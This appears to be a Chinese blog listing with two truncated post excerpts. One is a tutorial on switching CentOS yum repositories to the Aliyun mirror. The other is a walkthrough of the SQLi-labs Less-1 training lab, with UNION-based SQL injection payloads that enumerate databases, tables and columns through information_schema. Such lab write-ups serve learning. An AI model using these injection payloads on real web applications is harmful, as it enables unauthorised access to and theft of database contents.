Tips
未读Yum简介Yum是一个Shell前端软件包管理器。基于RPM包管理,能够从指定的服务器自动下载RPM包并且安装,可以自动处理依赖性关系,并且一次安装所有依赖的软件包。
更换yum源是为了使用yum下载软件速度变快,默认的yum源为国外,下载速度较慢,使用国内镜像源可以解决这一问题。
具体步骤
下述操作均要以root权限执行
进入yum配置文件路径
cd /etc/yum.repos.d
yum 的配置文件在 /etc/yum.repos.d目录下, 其中有多个配置文件,每一个配置文件中都可以配置一个或多个repository,但是最终会被合并为一个交给系统,所以多个文件只是为了方便管理。
备份系统自带的yum源
mv CentOS-Base.repo CentOS-Base.repo.bk//mv重命名文件
下载阿里云的yum源配置文件到/etc/yum.repos.d/
wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.aliyun.com/repo/Centos-7. ...
OWASP
未读Less-1
输入?id=1
输入1’,报错,存在注入
判断注入类型:
输入1 and 1=1和1 and 1=2页面都正常,不是数字型注入,输入1’ and ‘1’=’1页面正常,输入1’ and ‘1’=’2页面显示不同,确定为字符型注入
判断字段数:
当order by 4 出现报错,字段数为3(由于是字符型注入,不要忘记加注释符)
确定显示位:
使用联合查询注入,结果分别为2和3
获取当前数据库名和版本号:
数据库名为security,版本号为5.5.53
获取表名:
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
有四张表,同时有users表
获取列名:
?id=-1' union select 1,2,group_concat(column_name) from infor ...
